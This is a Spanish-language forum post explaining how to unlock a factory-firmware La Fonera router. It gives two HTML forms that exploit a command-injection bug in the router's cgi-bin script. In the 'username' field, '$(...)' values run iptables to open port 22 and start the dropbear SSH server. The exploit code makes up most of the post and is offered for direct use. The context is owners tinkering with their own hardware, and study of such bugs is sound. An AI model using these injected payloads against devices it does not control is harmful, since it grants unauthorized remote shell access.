De momento no, con la revision anterior se podia entrar utilizando un bug en los scripts del cgi-bin, que explotabamos desde la pagina de configuracion local de la fonera.
Con la esta revision sólo han corregido esos bugs, no han actualizado nada nuevo del firm,
lo que demuestra el empeño de fon en chaparnos el acceso al cacharroAunque aún sigues teniendo opciones :
a)
Por hardware : Te pillas el circuito con el chip max232 (o max233) o lo fabricas, y entras por el puerto serie
b)
Por software : Antes de enchufar tu fonera nueva a internet (para que no se actualize), la conectas a tu pc como se dice aqui :
http://www.fonera.info/index.php/topic,9.msg38.html#msg38- como la fonera "de fábrica" viene con un firmware obsoleto y se actualiza cuando le damos internet, pues solo cambiamos las ips del exploit anterior y entramos, habilitamos el accesso ssh y ya podemos darle internet para que se actualize sin problemas
Aqui pego los scripts con las ips modificadas
paso1.html
<html>
<head></head><body><center>
<form method="post"
action="http://169.254.255.1/cgi-bin/webif/connection.sh"
enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp
-dport 22 -j ACCEPT)" size="68" />
<input type="submit" name="submit" value="Submit" />
</form>
</center></body></html>
paso2.html
<html>
<head></head><body><center>
<form method="post"
action="http://169.254.255.1/cgi-bin/webif/connection.sh"
enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68"
><input type="submit" name="submit" value="Submit" />
</form>
</center></body></html></blockquote>
Recordad que
esto solo funciona con una fonera de fábrica, que no haya sido actualizada
Autor